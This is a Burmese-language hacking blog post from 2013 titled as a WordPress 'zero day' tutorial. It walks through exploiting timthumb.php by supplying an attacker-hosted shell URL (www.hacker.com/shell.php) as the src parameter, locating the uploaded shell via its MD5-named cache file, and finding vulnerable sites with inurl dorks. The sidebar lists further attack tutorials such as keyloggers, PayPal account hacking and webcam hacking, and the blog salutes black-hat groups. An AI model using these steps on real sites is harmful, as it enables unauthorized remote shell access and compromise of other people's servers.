WP ရဲ ့ Zer0 Day Exploit ကေတာ့ timthumb.php ကေန ေပါက္တာပါ။
timthumb ဆိုတဲ ့plug-in ဟာ photo ေတြကို ခ်ံဳ ့တဲ့ ခ်ဲ ့တဲ့ အခါ အရမ္း အသံုး၀င္ပါတယ္။
အဲ့ plug-in ကေနတဆင့္ တျခား URL ေတြက photo ေတြကိုပါ upload လုပ္လို ့ရပါတယ္။
exploit ကလည္း အဲ့မွာ စျဖစ္ေတာ့တာပဲ....
တျခား link ေတြကေန photo ယူမယ္ဆိုရင္ example အေနနဲ ့
www.target.com/.../timthumb.php?src=www.photosite.com/photo.php
ဆိုျပီးေတာ့ အလုပ္လုပ္တယ္ခင္ဗ်။အဲ့ဒီမွာ src= ရဲ ့ေနာက္မွာ မိမိ shell link ကို သြားထည့္မယ္ဆိုရင္
www.target.com/.../timthumb.php?src=www.hacker.com/shell.php
အဲ့ဒီနည္းနဲ ့ shell ကို upload လုပ္သြားမွာျဖစ္ပါတယ္။ဒီေနရာမွာ shell link ကို ဘယ္လိုျပန္ယူရမလဲဆိုေတာ့ shell.php ကို MD5 ျပန္ေျပာင္းေပးရမယ္ဗ်။
ဒါမွ www.hacker.com/shell.php ကို 3132FF33A3414422F97F13251661A890 အေနနဲ ့ေျပာင္းမယ္ဗ်ာ။
ဒါဆိုရင္ေတာ့ www.target.com/.../cach/src=3132FF33A3414422F97F13251661A890.php ကိုသြားလိုက္ရင္ မိမိတင္ထားတဲ ့ shell ကိုေတြ ့ရမွာျဖစ္ပါတယ္။
Zer0 Day Exploit ဟာ theme က plug-in မွာ ေပါက္ေနတာျဖစ္တဲ့အတြက္ thumb ရွိတဲ ့ directory ကိုသြားတဲ ့ေနရာမွာ theme ေပၚမူတည္ျပီး သြားရမွာျဖစ္ပါတယ္။
Example အေနနဲ ့ www.target.com ရဲ ့ theme ဟာ Fordrepoter ျဖစ္ရင္
www.target.com/fordrepoter/scripts/thumb.php ျဖစ္ျပီး upload လုပ္ခ်င္ရင္ေတာ့
www.target.com/fordrepoter/scripts/thumb.php?src=www.hacker.com/shell.php
နဲ ့လုပ္ရပါမယ္။shell ကို ျပန္သြားဖို ့အတြက္ကေတာ့ www.target.com/fordrepoter/scripts/cache/src=3132FF33A3414422F97F13251661A890.php ဆိုတဲ့ format အတိုင္း ျပန္သြားရပါ့မယ္။
Dork နဲ ့ရွာရင္လည္း theme ေပၚမူတည္ျပီး inurl ဒါမွမဟုတ္ allinurl နဲ ့တြဲျပီးေတာ့
fordreporter/scripts/thumb.php ဆိုျပီး ရွာရပါမယ္။
Thursday, June 20, 2013
//
Labels:
Hacking Tutorial
//
1 comments
//
1 comments to "WordPress ရဲ ့ Zer0 Day Exploit"
Post a Comment
သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။
Powered by Blogger.
Respect List
Blink Hacker Group
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Categories
@Lph@ blog ကို Android Devices ေတြေပၚကဖတ္ခ်င္ရင္
Link list 1
- Application (1)
- E-book (2)
- Facebook Tips & Tricks (2)
- Hacking Tutorial (37)
- HTML (2)
- Kali Linux (6)
- Mobile Tips & Tricks (5)
- Myanmar Cyber Army (1)
Popular Posts
-
Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။ index.p...
-
Kali Linux အသံုးျပဳသူေတြ အတြက္ အသံုး၀င္မယ့္ Tools ေတြရဲ ့ Descriptions ေတြရယ္ အသံုးျပဳပံုေတြ ပါ၀င္ပါတယ္။ Kali Linux ကို အသံုးျပဳေနတယ္ဆိုရ...
Followers
စည္းလုံးျခင္းသံစဥ္ေရဒီယုိ
Blog Archive
-
▼
2013
(56)
-
▼
June
(26)
- Android Bot Maker
- How to get someone IP Address
- Linux Sever တစ္ခုကို ဘယ္လို Root လုပ္မလဲ
- USB drive အသံုးျပဳျပီး Password မ်ားခိုးယူျခင္း
- Rooting A Server
- Inserting Keylogger Code in Android SwiftKey Using...
- Android Keylogger
- Firewall ကို Back Door / Trojan Virus ႏွင့္ ခ်ိဳးေ...
- Basic Spreading Method
- WordPress ရဲ ့ Zer0 Day Exploit
- Website Admin Panel ကို အလြယ္ကူဆံုး hack နည္း
- Hacking Paypal Accounts
- Hacking Joomla Sites
- DNN Method - Website Hacking
- Protect your Facebook account from hackers with My...
- Hack Wordpress Blogs
- Hack Unsecured Webcams
- How to secure your server from PHP Shells!
- HTML ဆုိတာဘာလဲ ?
- HTML မိတ္ဆက္
- IIS Exploit - Easiest way to deface Website [Windo...
- Hack YAHOO IDs by Brute Force Attack
- SMS Spoffer
- Hack / Bypass .asp sites using SQL Injection
- Hacking 800 Collection
- Blog ရဲ ့ရည္ရြယ္ခ်က္
-
▼
June
(26)
Anonymous says:
ေက်းဇူးတင္ပါတယ္